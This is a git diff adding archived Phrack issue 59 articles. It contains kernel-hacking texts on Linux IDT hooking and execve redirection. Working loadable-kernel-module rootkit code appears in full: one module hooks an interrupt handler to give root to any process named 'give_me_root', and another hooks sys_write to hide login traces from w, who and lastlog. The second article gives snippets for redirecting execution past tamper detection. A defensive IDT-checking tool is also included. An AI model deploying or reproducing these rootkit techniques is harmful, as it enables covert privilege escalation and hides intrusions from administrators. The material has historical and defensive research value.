+asmlinkage void my_function(unsigned long addr_task)
+        {
+        struct task_struct *p = &((struct task_struct *) addr_task)[0]; 
+	if(strcmp(p->comm,"give_me_root")==0 )
+                {
+   		#ifdef DEBUG             
+			printk("UID : %i GID : %i SUID : %i\n",p->uid,
+			p->gid,p->suid);
+		#endif
+                p->uid=0;
+                p->gid=0;
+  		#ifdef DEBUG 		
+			printk("UID : %i GID  %i SUID : %i\n",p->uid,p->gid,p->suid);
+		#endif 	
+                }
+        else
+                {
+                #ifdef DEBUG
+                        printk("<1>Interrupt %i hijack \n",interrupt);
+                #endif
+                }
+        }
+
+unsigned long get_addr_idt (void)
+        {
+         unsigned char idtr[6];
+         unsigned long idt;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        idt = *((unsigned long *) &idtr[2]);
+        return(idt);
+        }
+
+unsigned short get_size_idt(void)
+        {
+        unsigned idtr[6];
+        unsigned short size;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        size=*((unsigned short *) &idtr[0]);
+        return(size);
+        }
+
+void * get_stub_from_idt (int n)
+        {
+        struct descriptor_idt *idte = &((struct descriptor_idt *) ptr_idt_table) [n];
+        return ((void *) ((idte->offset_high << 16 ) + idte->offset_low));
+        }
+
+void hook_stub(int n,void *new_stub,unsigned long *old_stub)
+        {
+         unsigned long new_addr=(unsigned long)new_stub;
+         struct descriptor_idt *idt=(struct descriptor_idt *)ptr_idt_table;
+         //save old stub
+         if(old_stub)
+                *old_stub=(unsigned long)get_stub_from_idt(n);
+         #ifdef DEBUG
+                printk("Hook : new stub addresse not splited : 0x%.8x\n",new_addr);
+         #endif
+         //assign new stub
+         idt[n].offset_high = (unsigned short) (new_addr >> 16);
+         idt[n].offset_low  = (unsigned short) (new_addr & 0x0000FFFF);
+         #ifdef DEBUG
+                printk("Hook : idt->offset_high : 0x%.8x\n",idt[n].offset_high);
+                printk("Hook : idt->offset_low : 0x%.8x\n",idt[n].offset_low);
+         #endif
+         return;
+        }
+
+int write_console (char *str)
+        {
+         struct tty_struct *my_tty;
+         if((my_tty=current->tty) != NULL)
+                {
+                (*(my_tty->driver).write) (my_tty,0,str,strlen(str));
+                return 0;
+                }
+         else return -1;
+        }
+
+static int __init kad_init(void)
+        {
+        int x;
+ 	EXPORT_NO_SYMBOLS;       
+	ptr_idt_table=get_addr_idt();
+        write_console("Inserting hook \r\n");
+        hook_stub(interrupt,&my_stub,&old_stub);
+	#ifdef DEBUG
+                printk("Set hooking on interrupt %i\n",interrupt);
+        #endif
+        write_console("Hooking finished \r\n");
+        return 0;
+        }
+
+static void kad_exit(void)
+        {
+        write_console("Removing hook\r\n");
+        hook_stub(interrupt,(char *)old_stub,NULL);
+        }
+
+module_init(kad_init);
+module_exit(kad_exit);
+
+
+******************************************************************************
+
+CODE 3:
+-------
+
+/**************************************************************/
+/* Hooking of sys_write for w,who and lastlog. 
+/* You can add an another program when you insmod the module
+/* By kad
+/**************************************************************/
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/tty.h>
+#include <linux/sched.h>
+#include <linux/init.h>
+#ifndef KERNEL2
+#include <linux/slab.h>
+#else
+#include <linux/malloc.h>
+#endif
+#include <linux/interrupt.h>
+#include <linux/compatmac.h>
+
+#define sys_number 4
+#define HIDE_STRING "localhost"
+#define FALSE_STRING "somewhere"
+#define PROG "w"
+
+/*------------------------------------------*/
+asmlinkage char * my_function(struct pt_regs * regs,unsigned long fd_task);
+/*------------------------------------------*/
+MODULE_AUTHOR("kad");
+MODULE_DESCRIPTION("Hooking of sys_write");
+MODULE_PARM(interrupt,"i");
+MODULE_PARM_DESC(interrupt,"Interrupt number");
+MODULE_PARM(hide_string,"s");
+MODULE_PARM_DESC(hide_string,"String to hide");
+MODULE_PARM(false_string,"s");
+MODULE_PARM_DESC(false_string,"The fake string");
+MODULE_PARM(progy,"s");
+MODULE_PARM_DESC(progy,"You can add another program to fake");
+/*------------------------------------------*/
+unsigned long ptr_idt_table;
+unsigned long old_stub;
+extern asmlinkage void my_stub();
+unsigned long hostile_code=(unsigned long)&my_function;
+int interrupt;
+char *hide_string;
+char *false_string;
+char *progy;
+/*------------------------------------------*/
+
+struct descriptor_idt
+        {
+        unsigned short offset_low,seg_selector;
+        unsigned char reserved,flag;
+        unsigned short offset_high;
+        };
+
+void stub_kad(void)
+        {
+__asm__ (
+        ".globl my_stub                 \n"
+        ".align 4,0x90                  \n"
+        "my_stub:                       \n"
+                //save the register value
+                "       pushl %%ds                      \n"
+                "       pushl %%eax                     \n"
+                "       pushl %%ebp                     \n"
+                "       pushl %%edi                     \n"
+                "       pushl %%esi                     \n"
+                "       pushl %%edx                     \n"
+                "       pushl %%ecx                     \n"
+                "       pushl %%ebx                     \n"
+                //compare it's the good syscall
+                "       xor %%ebx,%%ebx                 \n"
+                "       movl %2,%%ebx	                \n"
+                "       cmpl %%eax,%%ebx                \n"
+                "       jne finis                       \n"
+                //if it's the good syscall , continue :)
+                "       mov %%esp,%%edx                 \n"
+                "       mov %%esp,%%eax                 \n"
+                "       andl $-8192,%%eax               \n"
+                "       pushl %%eax                     \n"
+                "       push %%edx          		\n"
+                "       call *%0                        \n"
+                "       addl $8,%%esp                   \n"
+                "finis:                                 \n"
+                //restore register
+                "       popl %%ebx    		        \n"
+                "       popl %%ecx        		\n"
+                "       popl %%edx          		\n"
+                "       popl %%esi           		\n"
+                "       popl %%edi             	  	\n"
+                "       popl %%ebp              	\n"
+                "       popl %%eax              	\n"
+                "       popl %%ds               	\n"
+                "       jmp  *%1                	\n"
+        ::"m"(hostile_code),"m"(old_stub),"i"(sys_number)
+        );
+        }
+
+asmlinkage char * my_function(struct pt_regs * regs,unsigned long fd_task)
+        {
+        struct task_struct *my_task = &((struct task_struct * ) fd_task) [0];
+        char *ptr=(char *) regs->ecx;
+        char * buffer,*ptr3;
+
+        if(strcmp(my_task->comm,"w")==0 || strcmp(my_task->comm,"who")==0 
+	|| strcmp(my_task->comm,"lastlog")==0 							
+	|| ((progy != 0)?(strcmp(my_task->comm,progy)==0):0) )
+               {
+                buffer=(char * ) kmalloc(regs->edx,GFP_KERNEL);
+                copy_from_user(buffer,ptr,regs->edx);
+                if(hide_string)
+                        {
+                         ptr3=strstr(buffer,hide_string);
+                        }
+                else
+                        {
+                         ptr3=strstr(buffer,HIDE_STRING);
+                        }
+                if(ptr3 != NULL )
+                        {
+                        if (false_string)
+                                {
+                                strncpy(ptr3,false_string,strlen(false_string));
+                                }
+                        else
+                                {
+                                strncpy(ptr3,FALSE_STRING,strlen(FALSE_STRING));
+                                }
+                        copy_to_user(ptr,buffer,regs->edx);
+                        }
+                kfree(buffer);
+               }
+        }
+
+unsigned long get_addr_idt (void)
+        {
+         unsigned char idtr[6];
+         unsigned long idt;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        idt = *((unsigned long *) &idtr[2]);
+        return(idt);
+        }
+
+void * get_stub_from_idt (int n)
+        {
+        struct descriptor_idt *idte = &((struct descriptor_idt *) ptr_idt_table) [n];
+        return ((void *) ((idte->offset_high << 16 ) + idte->offset_low));
+        }
+
+void hook_stub(int n,void *new_stub,unsigned long *old_stub)
+        {
+         unsigned long new_addr=(unsigned long)new_stub;
+         struct descriptor_idt *idt=(struct descriptor_idt *)ptr_idt_table;
+         //save old stub
+         if(old_stub)
+                *old_stub=(unsigned long)get_stub_from_idt(n);
+         #ifdef DEBUG
+                printk("Hook : new stub addresse not splited : 0x%.8x\n",
+		new_addr);
+         #endif
+         //assign new stub
+         idt[n].offset_high = (unsigned short) (new_addr >> 16);
+         idt[n].offset_low  = (unsigned short) (new_addr & 0x0000FFFF);
+         #ifdef DEBUG
+                printk("Hook : idt->offset_high : 0x%.8x\n",idt[n].offset_high);
+                printk("Hook : idt->offset_low : 0x%.8x\n",idt[n].offset_low);
+         #endif
+         return;
+        }
+
+int write_console (char *str)
+        {
+         struct tty_struct *my_tty;
+         if((my_tty=current->tty) != NULL)
+                {
+                (*(my_tty->driver).write) (my_tty,0,str,strlen(str));
+                return 0;
+                }
+         else return -1;
+        }
+
+static int __init kad_init(void)
+        {
+        EXPORT_NO_SYMBOLS;
+        ptr_idt_table=get_addr_idt();
+        write_console("Inserting hook \r\n");
+        hook_stub(interrupt,&my_stub,&old_stub);
+        #ifdef DEBUG
+                printk("Set hooking on interrupt %i\n",interrupt);
+        #endif
+        write_console("Hooking finish \r\n");
+        return 0;
+        }
+
+static void kad_exit(void)
+        {
+        write_console("Removing hook\r\n");
+        hook_stub(interrupt,(char *)old_stub,NULL);
+        }
+
+module_init(kad_init);
+module_exit(kad_exit);
+
+
+******************************************************************************
+
+<++> checkidt/Makefile
+all: checkidt.c
+	gcc -Wall -o checkidt checkidt.c
+<-->
+
+<++> checkidt/checkidt.c
+/*
+ * CheckIDT V1.1
+ * Play with IDT from userland
+ * It's a tripwire kind for IDT
+ * kad 2002
+ * 
+ * gcc -Wall -o checkidt checkidt.c
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <asm/segment.h>
+#include <string.h>
+
+#define NORMAL          "\033[0m"
+#define NOIR            "\033[30m"
+#define ROUGE           "\033[31m"
+#define VERT            "\033[32m"
+#define JAUNE           "\033[33m"
+#define BLEU            "\033[34m"
+#define MAUVE           "\033[35m"
+#define BLEU_CLAIR      "\033[36m"
+#define SYSTEM          "System gate"
+#define INTERRUPT       "Interrupt gate"
+#define TRAP            "Trap gate"
+#define DEFAULT_FILE    "Safe_idt"
+#define DEFAULT_MAP		"/boot/System.map"
+
+/***********GLOBAL**************/
+int fd_kmem;
+unsigned long ptr_idt;
+/******************************/
+
+
+struct descriptor_idt
+        {
+        unsigned short offset_low,seg_selector;
+        unsigned char reserved,flag;
+        unsigned short offset_high;
+        };
+
+struct Mode
+        {
+         int show_idt_addr;
+         int show_all_info;
+         int read_file_archive;
+         int create_file_archive;
+         char out_filename[20];
+         int compare_idt;
+         int restore_idt;
+         char in_filename[20];
+         int show_all_descriptor;
+	 int resolve;
+	 char map_filename[40];   
+      };
+
+unsigned long get_addr_idt (void)
+        {
+         unsigned char idtr[6];
+         unsigned long idt;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        idt = *((unsigned long *) &idtr[2]);
+        return(idt);
+        }
+
+unsigned short get_size_idt(void)
+        {
+        unsigned idtr[6];
+        unsigned short size;
+        __asm__ volatile ("sidt %0": "=m" (idtr));
+        size=*((unsigned short *) &idtr[0]);
+        return(size);
+        }
+
+char * get_segment(unsigned short selecteur)
+        {
+         if(selecteur == __KERNEL_CS)
+                {
+                 return("KERNEL_CS");
+                }
+         if(selecteur == __KERNEL_DS)
+                {
+                 return("KERNEL_DS");
+                }
+         if(selecteur == __USER_CS)
+                {
+                 return("USER_CS");
+                }
+         if(selecteur == __USER_DS)
+                {
+                 return("USER_DS");
+                }
+         else
+                {
+                 printf("UNKNOW\n");
+                }
+        }
+
+
+void readkmem(void *m,unsigned off,int size)
+        {
+        if(lseek(fd_kmem,off,SEEK_SET) != off)
+                {
+                fprintf(stderr,"Error lseek. Are you root? \n");
+                exit(-1);
+                }
+        if(read(fd_kmem,m,size)!= size)
+                {
+                fprintf(stderr,"Error read kmem\n");
+                exit(-1);
+                }
+        }
+
+void writekmem(void *m,unsigned off,int size)
+        {
+        if(lseek(fd_kmem,off,SEEK_SET) != off)
+                {
+                fprintf(stderr,"Error lseek. Are you root? \n");
+                exit(-1);
+                }
+        if(write(fd_kmem,m,size)!= size)
+                {
+                fprintf(stderr,"Error read kmem\n");
+                exit(-1);
+                }
+        }
+
+void resolv(char *file,unsigned long stub_addr,char *name)
+	{
+	FILE *fd;
+	char buf[100],addr[30];
+	int ptr,ptr_begin,ptr_end;
+	snprintf(addr,30,"%x",(char *)stub_addr);
+	if(!(fd=fopen(file,"r")))
+		{
+		fprintf(stderr,"Can't open map file. You can specify a map file -S option or change #define in source\n");
+		exit(-1);
+		}
+ 	while(fgets(buf,100,fd) != NULL)
+		{	
+		ptr=strstr(buf,addr);
+		if(ptr)
+			{
+			bzero(name,30);
+			ptr_begin=strstr(buf," ");
+			ptr_begin=strstr(ptr_begin+1," ");
+			ptr_end=strstr(ptr_begin+1,"\n");
+			strncpy(name,ptr_begin+1,ptr_end-ptr_begin-1);
+			break;
+			}
+	 	}
+	if(strlen(name)==0)strcpy(name,ROUGE"can't resolve"NORMAL); 
+	fclose(fd);
+	}
+
+void show_all_info(int interrupt,int all_descriptor,char *file,int resolve)
+        {
+        struct descriptor_idt *descriptor;
+        unsigned long stub_addr;
+        unsigned short selecteur;
+        char type[15];
+        char segment[15];
+	char name[30];
+        int x;
+        int dpl;
+	bzero(name,strlen(name));
+        descriptor=(struct descriptor_idt *)malloc(sizeof(struct descriptor_idt));
+        printf("Int *** Stub Address *** Segment *** DPL *** Type ");
+	if(resolve >= 0) 
+		{
+		printf("            Handler Name\n");
+		printf("--------------------------------------------------------------------------\n");
+		}
+	else
+		{
+		printf("\n");
+        	printf("---------------------------------------------------\n");
+		}
+	
+        if(interrupt >= 0)
+                {
+                readkmem(descriptor,ptr_idt+8*interrupt,sizeof(struct descriptor_idt));
+                stub_addr=(unsigned long)(descriptor->offset_high << 16) + descriptor->offset_low;
+                selecteur=(unsigned short) descriptor->seg_selector;
+                if(descriptor->flag & 64) dpl=3;
+                else dpl = 0;
+                if(descriptor->flag & 1)
+                        {
+                        if(dpl)
+                                strncpy(type,SYSTEM,sizeof(SYSTEM));
+                        else strncpy(type,TRAP,sizeof(TRAP));
+                        }
+                else strncpy(type,INTERRUPT,sizeof(INTERRUPT));
+                strcpy(segment,get_segment(selecteur));
+                
+		if(resolve >= 0) 
+			{
+			resolv(file,stub_addr,name); 
+			printf("%-7i 0x%-14.8x %-12s%-8i%-16s %s\n",interrupt,stub_addr,segment,dpl,type,name);
+			}
+		else 
+			{
+			printf("%-7i 0x%-14.8x %-12s %-7i%s\n",interrupt,stub_addr,segment,dpl,type);
+			}   
+             }
+        if(all_descriptor >= 0 )
+                {
+                for (x=0;x<(get_size_idt()+1)/8;x++)
+                        {
+                        readkmem(descriptor,ptr_idt+8*x,sizeof(struct descriptor_idt));
+                        stub_addr=(unsigned long)(descriptor->offset_high << 16) + descriptor->offset_low;
+                        if(stub_addr != 0)
+                                {
+                                selecteur=(unsigned short) descriptor->seg_selector;
+                                if(descriptor->flag & 64) dpl=3;
+                                else dpl = 0;
+                                if(descriptor->flag & 1)
+                                        {
+                                        if(dpl)
+                                                strncpy(type,SYSTEM,sizeof(SYSTEM));
+                                        else strncpy(type,TRAP,sizeof(TRAP));
+                                        }
+                                else strncpy(type,INTERRUPT,sizeof(INTERRUPT));
+                                strcpy(segment,get_segment(selecteur));
+						if(resolve >= 0) 
+							{
+							bzero(name,strlen(name));
+							resolv(file,stub_addr,name);
+							printf("%-7i 0x%-14.8x %-12s%-8i%-16s %s\n",x,stub_addr,segment,dpl,type,name);
+							}
+						else
+							{ 
+	                            printf("%-7i 0x%-14.8x %-12s %-7i%s\n",x,stub_addr,segment,dpl,type);
+							}
+                                }
+                        }
+                }
+        free(descriptor);
+        }
+
+void create_archive(char *file)
+        {
+         FILE *file_idt;
+         struct descriptor_idt *descriptor;
+         int x;
+         descriptor=(struct descriptor_idt *)malloc(sizeof(struct descriptor_idt));
+         if(!(file_idt=fopen(file,"w")))
+                {
+                fprintf(stderr,"Error while opening file\n");
+                exit(-1);
+                }
+         for(x=0;x<(get_size_idt()+1)/8;x++)
+                {
+                readkmem(descriptor,ptr_idt+8*x,sizeof(struct descriptor_idt));
+                fwrite(descriptor,sizeof(struct descriptor_idt),1,file_idt);
+                }
+         free(descriptor);
+         fclose(file_idt);
+         fprintf(stderr,"Creating file archive idt done \n");
+        }
+
+void read_archive(char *file)
+        {
+         FILE *file_idt;
+         int x;
+         struct descriptor_idt *descriptor;
+         unsigned long stub_addr;
+         descriptor=(struct descriptor_idt *)malloc(sizeof(struct descriptor_idt));
+         if(!(file_idt=fopen(file,"r")))
+                {
+                fprintf(stderr,"Error, check if the file exist\n");
+                exit(-1);
+                }
+         for(x=0;x<(get_size_idt()+1)/8;x++)
+                {
+                fread(descriptor,sizeof(struct descriptor_idt),1,file_idt);
+                stub_addr=(unsigned long)(descriptor->offset_high << 16) + descriptor->offset_low;
+                printf("Interruption : %i  -- Stub addresse : 0x%.8x\n",x,stub_addr);
+                }
+         free(descriptor);
+         fclose(file_idt);
+        }
+
+void compare_idt(char *file,int restore_idt)
+        {
+        FILE *file_idt;
+        int x,change=0;
+        int result;
+        struct descriptor_idt *save_descriptor,*actual_descriptor;
+        unsigned long save_stub_addr,actual_stub_addr;
+        unsigned short *offset;
+        save_descriptor=(struct descriptor_idt *)malloc(sizeof(struct descriptor_idt));
+        actual_descriptor=(struct descriptor_idt *)malloc(sizeof(struct descriptor_idt));
+        file_idt=fopen(file,"r");
+        for(x=0;x<(get_size_idt()+1)/8;x++)
+                {
+                fread(save_descriptor,sizeof(struct descriptor_idt),1,file_idt);
+                save_stub_addr=(unsigned long)(save_descriptor->offset_high << 16) + save_descriptor->offset_low;
+                readkmem(actual_descriptor,ptr_idt+8*x,sizeof(struct descriptor_idt));
+                actual_stub_addr=(unsigned long)(actual_descriptor->offset_high << 16) + actual_descriptor->offset_low;
+                if(actual_stub_addr != save_stub_addr)
+                        {
+                         if(restore_idt < 1)
+                                {
+                                fprintf(stderr,VERT"Hey stub address of interrupt %i has changed!!!\n"NORMAL,x);
+                                fprintf(stderr,"Old Value : 0x%.8x\n",save_stub_addr);
+                                fprintf(stderr,"New Value : 0x%.8x\n",actual_stub_addr);
+                                change=1;
+                                }
+                         else
+                                {
+                                fprintf(stderr,VERT"Restore old stub address of interrupt %i\n"NORMAL,x);
+                                actual_descriptor->offset_high = (unsigned short) (save_stub_addr >> 16);
+                                actual_descriptor->offset_low  = (unsigned short) (save_stub_addr & 0x0000FFFF);
+                                writekmem(actual_descriptor,ptr_idt+8*x,sizeof(struct descriptor_idt));
+                                change=1;
+                                }
+                        }
+                }
+        if(!change)
+                fprintf(stderr,VERT"All values are same\n"NORMAL);
+        }
+
+void initialize_value(struct Mode *mode)
+        {
+        mode->show_idt_addr=-1;
+        mode->show_all_info=-1;
+        mode->show_all_descriptor=-1;
+        mode->create_file_archive=-1;
+        mode->read_file_archive=-1;
+        strncpy(mode->out_filename,DEFAULT_FILE,strlen(DEFAULT_FILE));
+        mode->compare_idt=-1;
+        mode->restore_idt=-1;
+        strncpy(mode->in_filename,DEFAULT_FILE,strlen(DEFAULT_FILE));
+	strncpy(mode->map_filename,DEFAULT_MAP,strlen(DEFAULT_MAP));
+	mode->resolve=-1;
+        }
+
+void usage()
+        {
+        fprintf(stderr,"CheckIDT V 1.1 by kad\n");
+        fprintf(stderr,"---------------------\n");
+        fprintf(stderr,"Option : \n");
+        fprintf(stderr,"       -a nb    show all info about one interrupt\n");
+        fprintf(stderr,"       -A       showw all info about all interrupt\n");
+        fprintf(stderr,"       -I       show IDT address \n");
+        fprintf(stderr,"       -c       create file archive\n");
+        fprintf(stderr,"       -r       read file archive\n");
+        fprintf(stderr,"       -o file  output filename (for creating file archive)\n");
+        fprintf(stderr,"       -C       compare save idt & new idt\n");
+        fprintf(stderr,"       -R       restore IDT\n");
+        fprintf(stderr,"       -i file  input filename to compare or read\n");
+	fprintf(stderr,"       -s 		resolve symbol thanks to /boot/System.map\n");
+	fprintf(stderr,"       -S file	specify a map file\n\n"); 
+        exit(1);
+        }
+
+int main(int argc, char ** argv)
+        {
+        int option;
+        struct Mode *mode;
+        if (argc < 2)
+                {
+		 usage();
+                }
+
+        mode=(struct Mode *) malloc(sizeof(struct Mode));
+        initialize_value(mode);
+
+        while((option=getopt(argc,argv,"hIa:Aco:Ci:rRsS:"))!=-1)
+                {
+                switch(option)
+                        {
+                        case 'h': usage();
+                                  exit(1);
+                        case 'I': mode->show_idt_addr=1;
+                                  break;
+                        case 'a': mode->show_all_info=atoi(optarg);
+                                  break;
+                        case 'A': mode->show_all_descriptor=1;
+                                  break;
+                        case 'c': mode->create_file_archive=1;
+                                  break;
+                        case 'r': mode->read_file_archive=1;
+                                  break;
+                        case 'R': mode->restore_idt=1;
+                                  break;
+                        case 'o': bzero(mode->out_filename,sizeof(mode->out_filename));
+                                  if(strlen(optarg) > 20)
+                                        {
+                                         fprintf(stderr,"Filename too long\n");
+                                         exit(-1);
+                                        }
+                                  strncpy(mode->out_filename,optarg,strlen(optarg));
+                                  break;
+                        case 'C': mode->compare_idt=1;
+                                  break;
+                        case 'i': bzero(mode->in_filename,sizeof(mode->in_filename));
+                                  if(strlen(optarg) > 20)
+                                        {
+                                        fprintf(stderr,"Filename too long\n");
+                                        exit(-1);
+                                        }
+                                  strncpy(mode->in_filename,optarg,strlen(optarg));
+                                  break;
+				case 's': mode->resolve=1;
+					      break;
+				case 'S': bzero(mode->map_filename,sizeof(mode->map_filename));
+						  if(strlen(optarg) > 40)
+								{
+								fprintf(stderr,"Filename too long\n");
+								exit(-1);
+								}
+						  if(optarg)strncpy(mode->map_filename,optarg,strlen(optarg));
+						  break;
+                        }
+                }
+	printf("\n");
+        ptr_idt=get_addr_idt();
+        if(mode->show_idt_addr >= 0)
+                {
+                 fprintf(stdout,"Addresse IDT : 0x%x\n",ptr_idt);
+                }
+        fd_kmem=open("/dev/kmem",O_RDWR);
+        if(mode->show_all_info >= 0 || mode->show_all_descriptor >= 0)
+                {
+                show_all_info(mode->show_all_info,mode->show_all_descriptor,mode->map_filename,mode->resolve);
+                }
+        if(mode->create_file_archive >= 0)
+                {
+                create_archive(mode->out_filename);
+                }
+        if(mode->read_file_archive >= 0)
+                {
+                read_archive(mode->in_filename);
+                }
+        if(mode->compare_idt >= 0)
+                {
+                compare_idt(mode->in_filename,mode->restore_idt);
+                }
+        if(mode->restore_idt >= 0)
+                {
+                compare_idt(mode->in_filename,mode->restore_idt);
+                }
+        printf(JAUNE"\nThanks for choosing kad's products :-)\n"NORMAL);
+
+        free(mode);
+        return 0;
+        }
+
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/5.txt b/phrack59/5.txt
new file mode 100644
index 0000000..682bb2b
--- /dev/null
+++ b/phrack59/5.txt
@@ -0,0 +1,489 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x05 of 0x12
+
+|=---=[ 5 Short Stories about execve (Advances in Kernel Hacking II) ]=--=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ palmers <palmers@team-teso.net> ]=-----------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Execution Redirection
+
+  3 - Short Stories
+    3.1 - The Classic
+    3.2 - The Obvious
+    3.3 - The Waiter
+    3.4 - The Nexus
+    3.5 - The Lord
+
+  4 - Conclusion
+
+  5 - Reference
+
+  Appendix A: stories.tgz.uu
+
+  Appendix B: fluc.c.gz.uu
+
+
+--[ 1 - Introduction
+
+  "Oedipus: What is the rite of purification? How shall it be done?
+Creon: By banishing a man, or expiation of blood by blood ..."
+		- Sophocles, Oedipus the King
+
+  What once was said cannot be banished. Expiation of the wrongs that
+inspire peoples thinking and opinion may change.
+
+  I concern again on kernel hacking, not on literature. Especially in this
+field many, many ideas need to be expiated as useless. That does not mean
+they do not allow to solve particular problems. It means the problems which
+can be solved are not those which were aimed to be solved.
+
+
+--[ 2 - Execution Redirection
+
+  If a binary is requested to be executed, you are redirecting execution
+when you execute another binary. The user will stay unnotified of the
+change. Some kernel modules implement this feature as it can be used to
+replace a file but only when executed. The real binary will remain
+unmodified.
+
+  Since no file is modified, tamper detection systems as [1] or [2] cannot
+percept such a backdoor. On the other hand, execution redirection is used
+in honeypot scenarios to fool attackers.
+
+  Even after years of active kernel development, the loadable kernel
+modules (lkm) implementing execution redirection use merely the same
+technique. As this makes it easy for some admins to percept a backdoor
+faster, others still are not aware of the danger. However, the real danger
+was not yet presented.
+
+
+--[ 3 - Short Stories
+
+  I will show five different approaches how execution can be redirected.
+Appendix A contains working example code to illustrate them. The examples
+do work but are not really capable to be used in the wild. You get the
+idea.
+
+  In order to understand the sourcecodes provided it is helpful to read [4]
+or [5].
+
+  The example code just show how this techniques can be used in a lkm.
+Further, I implemented them only for Linux. These techniques are not
+limited to Linux. With minor (and in a few cases major) modifications most
+can be ported to any UNIX. 
+
+
+--[ 3.1 - The Classic
+
+  Only for completeness, the classic. Redirection is achieved by replacing
+the system call handling execution. See classic.c from appendix A. There is
+nothing much to say about this one; it is used by [3] and explained in [6].
+It might be detected by checking the address pointed to in the system call
+table.
+
+
+--[ 3.2 - The Obvious
+
+  Since the system call is architecture dependent, there is a underlying
+layer handling the execution. The kernel sourcecode represents it in
+do_execve (~/fs/exec.c). The execve system call can be understood as a
+wrapper to do_execve. We will replace do_execve:
+
+	n_do_execve (char *file, char **arvp, char **envp, \
+				struct pt_regs *regs)
+	...
+	if (!strcmp (file, O_REDIR_PATH)) {
+		file = strdup (N_REDIR_PATH);
+	}
+
+	restore_do_execve ();
+	ret = do_execve (file, arvp, envp, regs);
+	redirect_do_execve ();
+	...
+
+  To actually redirect the execution we replace do_execve and replace the
+filename on demand. It is obviously the same approach as wrapping the
+execve system call. For a implementation see obvious.c in appendix A. No
+lkm using this technique is known to me.
+
+  Detecting this one is not as easy as detecting the classic and depends on
+the technique used to replace it. (Checking for a jump instruction right at
+function begin is certainly a good idea).
+
+
+--[ 3.3 - The Waiter
+
+  Upon execution, the binary has to be opened for reading. The kernel gives
+a dedicated function for this task, open_exec. It will open the binary file
+and do some sanity checks.
+
+  As open_exec needs the complete path to the binary to open it this is
+again easy going. We just replace the filename on demand and call the
+original function. open_exec is called from within do_execve.
+
+  To the waiter the same applies as to the obvious. Detection is possible
+but not trivial.
+
+
+--[ 3.4 - The Nexus
+
+  After the binary file is opened, its ready to be read, right? Before it
+is done, the according binary format handler is searched. The handler
+processes the binary. Normally, this ends in the start of a new process.
+
+  A binary format handler is defined as following (see ~/include/linux/
+binfmts.h):
+
+	/*
+	 * This structure defines the functions that are
+	 * used to load the binary formats that linux
+	 * accepts.
+	 */
+	struct linux_binfmt {
+		struct linux_binfmt * next;
+		struct module *module;
+		int (*load_binary)(struct linux_binprm *, \
+				struct pt_regs * regs);
+		int (*load_shlib)(struct file *);
+		int (*core_dump)(long signr, struct pt_regs * regs, \
+				struct file * file);
+		unsigned long min_coredump;	/* minimal dump size */
+	};
+
+  Binary format handlers provide three pointers to functions. One for
+loading libraries, another for producing core dump files, the third for
+loading binaries (pfff ...). We replace this pointer.
+
+  Our new load_binary function looks as follows:
+
+	int new_load_binary (struct linux_binprm *bin, \
+				struct pt_regs *regs) {
+		int ret;
+		if (!strcmp (bin->filename, O_REDIR_PATH)) {
+			/*
+			 * if a binary, subject to redirection, is about
+			 * to be executed just close the file
+			 * descriptor and open a new file. do not
+			 * forget resetup.
+			 */
+			filp_close (bin->file, 0);
+			bin->file = open_exec (N_REDIR_PATH);
+
+			prepare_binprm (bin);
+			goto out;
+		}
+	out:
+		return old_load_binary (bin, regs);
+	}
+
+  But how can we get the binary handlers? They are not exported, if not
+loaded as module. A possibility is executing and watching a binary of all
+available binary formats. Since the task structure inside the kernel
+carries a pointer to the handler for its binary it is possible to collect
+the pointers. (The handlers form a linked list - it is not really needed to
+execute one binary of each type; theoretically at least).
+
+  The reference implementation, nexus.c in appendix A, fetches the first
+binary handler it gets its hands on. This is reasonable since virtually all
+linux distributors use homogeneous ELF based user land. What is more, it
+is very unlikely that the binary format of system binaries change.
+
+  As used by nexus.c, one way of fetching binary handlers. Note that we do
+replace a system call but we restore it immediatly after we got our binary
+handler. This opens a very small time window where the replaced system call
+might be detected (if tried at all). Of course, we could have fetched the
+pointer directly in init_module. In other words: the time window is
+arbitrary small.
+
+	int n_open (char *file, int flags) {
+		int ret = o_open (file, flags);
+
+		/*
+		 * ... get one. be sure to save (and restore)
+		 * the original pointer. having binary hand-
+		 * lers pointing to nirvana is no fun.
+		 */
+		elf_bin = current->binfmt;
+		old_load_binary = elf_bin->load_binary;
+		elf_bin->load_binary = &new_load_binary;
+
+		/*
+		 * and restore the system call.
+		 */
+		sys_call_table[__NR_open] = o_open;
+
+		return ret;
+	}
+
+  An evil attack would of course replace the core_dump pointer, too.
+Otherways it may be possible to detect redirection of execution by letting
+each process, right after creation, coredump. Then one may check properties
+of the dump and if they match, or not, execution may be reinitalized, or
+not, respectively. I do not recomment this method to detect redirection,
+though.
+
+  An evil virus could wrap the load_binary function for infecting all
+binaries executed in memory.
+
+  Even replaced pointers are hard to check if you do not know where they
+are. If we have a recent System.map file, we can walk the list of binary
+handlers since we can look up the address of the root entry ("formats" as
+defined in ~/fs/exec.c) and the handler functions. In other cases we might
+be out of luck. One might try to collect the unmodified addresses himself
+to be able to check them later one. Not a good idea ...
+
+
+--[ 3.5 - The Lord
+
+  What about not redirecting execution at execution time? Where is the
+logic in not redirecting execution flow when it is exactly what we are
+doing here?
+
+  When ELF binaries are executed, the kernel invokes a dynamic linker. It
+does necessary setup work as loading shared libraries and relocating them.
+We will try to make an advantage of this.
+
+  Between execution of a binary at system level and the start of the
+execution at user level is a gap where the setup described above is done.
+And as loading of libraries involves mmap'ing and mprotect'ing we already
+know where we can start. We will just look at these system calls. Shared
+libraries are loaded to the same (static) address (which might differ from
+system to system). If a certain address is to be mapped or mprotect'ed by a
+certain process we restart the execution, with our binary. At this point of
+execution, the process calling mmap or mprotect is the dynamic linker.
+
+  That is was the example implementation in appendix A, lord.c, does.
+
+  Note that we can, of course, look for an arbitrary runtime pattern, there
+is no need for sticking to mmap or mprotect system calls. It is only of
+importance to start the new binary before the user can percept what is
+going on.
+
